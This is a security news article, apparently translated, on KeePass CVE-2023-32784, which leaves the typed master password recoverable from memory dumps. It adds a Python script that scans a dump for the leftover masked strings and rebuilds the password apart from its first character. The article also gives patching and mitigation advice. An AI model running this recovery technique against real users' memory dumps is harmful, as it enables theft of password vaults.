Vulnerability in KeePass allows attackers to extract the master password from the application’s memory
There is still no fix, and a proof-of-concept exploit is already circulating publicly.
The popular password manager KeePass contains a vulnerability that allows the master password to be recovered from the application’s memory. An attacker who gains access to the device can therefore learn the master password even when the database is locked.
The existence of the vulnerability was reported by a security researcher under the pseudonym “vdohney”, who also published a tool to demonstrate the attack. With this tool, you can recover the master password in plain text, with the exception of the first character, which can be guessed fairly quickly.
Password managers allow users to create unique passwords for each online account and store them in an encrypted database. To access it, you need to know only one master password, which should not be shared with anyone.
However, the new KeePass vulnerability, tracked as CVE-2023-32784, makes it possible to recover the master password. The problem lies in the custom text box KeePass 2.x uses for password entry: every time a character is typed, a leftover string is created in memory consisting of the mask character “●” repeated once for each previously typed character, followed by the character just typed. These strings are never zeroed, so a memory dump contains the password character by character, except for the first one, which leaves only a bare single character indistinguishable from other data.
“KeePass Master Password Dumper is a simple attack demonstration tool that extracts the master password from KeePass memory. Other than the first character of the password, it almost completely recovers it in plain text,” warns the researcher on the tool’s page on GitHub.
To exploit the vulnerability, the attacker needs a memory dump of the KeePass process, which can be obtained by physically accessing the device or by infecting it with malware. A live process dump is not strictly required: the leftover strings can also survive in a crash dump, in the page file or hibernation file, or in a dump of the whole system’s RAM. The memory dump and the KeePass database are then sent to the attacker, who extracts the password offline.
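As an added illustration (this is not vdohney’s tool and not code from the article), the following Python script reproduces the recovery step on a constructed memory dump. The dump is seeded with the kind of leftover strings the KeePass 2.x password box creates, UTF-16LE runs of “●” (U+25CF, bytes CF 25) followed by the typed character, and the scanner reads the password back position by position. The sample password, the filler bytes and all function names are assumptions for the demonstration.

```python
import re
from collections import defaultdict

# KeePass 2.x masks each typed character with "●" (U+25CF).  The leftover
# .NET strings are UTF-16LE, so every mask character is the byte pair CF 25.
MASK = "\u25cf"
MASK_LE = MASK.encode("utf-16-le")          # b"\xcf\x25"

# Constructed filler: heap bytes that do not contain the CF 25 pair.
NOISE = b"\x00" * 32 + b"unrelated heap data " + b"\x00" * 32


def make_dump(password: str, noise: bytes = NOISE) -> bytes:
    """Constructed sample dump (not a real KeePass dump).

    Emulates what the password box leaves behind: for the character at
    index i (i >= 1) a string of i mask characters followed by that
    character.  Index 0 leaves only the bare character, indistinguishable
    from other heap data, which is why the first character is not recoverable.
    """
    chunks = [noise]
    for i in range(1, len(password)):
        chunks.append((MASK * i + password[i]).encode("utf-16-le"))
        chunks.append(noise)
    return b"".join(chunks)


# A run of one or more CF 25 pairs followed by exactly one UTF-16 code unit.
LEFTOVER_RE = re.compile(rb"(?:\xcf\x25)+(..)", re.DOTALL)


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Scan a dump for leftover strings; return index -> candidate characters.

    Index 0 never appears.  An index can have several candidates when the
    user corrected a typo (every edit leaves its own string), which is why
    sets are returned rather than a single guess.
    """
    cands: dict[int, set[str]] = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        index = (m.start(1) - m.start()) // 2      # number of mask characters
        try:
            ch = m.group(1).decode("utf-16-le")
        except UnicodeDecodeError:                 # lone surrogate: not a character
            continue
        if ch.isprintable():
            cands[index].add(ch)
    return dict(cands)


def reconstruct(cands: dict[int, set[str]]) -> str:
    """Assemble the best guess: '?' for the unknown first character and for
    any gap, '{...}' where several candidates compete for one index."""
    if not cands:
        return ""
    out = ["?"]
    for index in range(1, max(cands) + 1):
        chars = sorted(cands.get(index, ()))
        if len(chars) == 1:
            out.append(chars[0])
        elif not chars:
            out.append("?")
        else:
            out.append("{" + "".join(chars) + "}")
    return "".join(out)


if __name__ == "__main__":
    dump = make_dump("Password123!")              # constructed sample password
    print(reconstruct(recover_candidates(dump)))  # ?assword123!
```

On a real dump the scanner sees every string the text box ever produced, so a typo that was corrected shows up as a second candidate at that index; that is why the result is a set of candidates per position rather than a single string, and why the first character still has to be brute-forced.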
The vulnerability affects KeePass 2.x up to and including the current release 2.53.1, and probably all projects based on its code. KeePass 1.x, KeePassXC and Strongbox are reported not to be affected.
Dominik Reichl, the developer of KeePass, received the report in advance and has promised a fix for CVE-2023-32784 in version 2.54. Note that updating only stops new leftover strings from being created: a memory dump, page file or hibernation file written while a vulnerable version was running can still contain the master password, so changing the master password after the update, and removing old crash dumps, is the prudent course.
Until the fix ships, the usual precautions apply: be careful when downloading programs from untrusted sites and beware of phishing, since malware running on the device is the most realistic way for an attacker to obtain the memory dump.
Source: www.securitylab.ru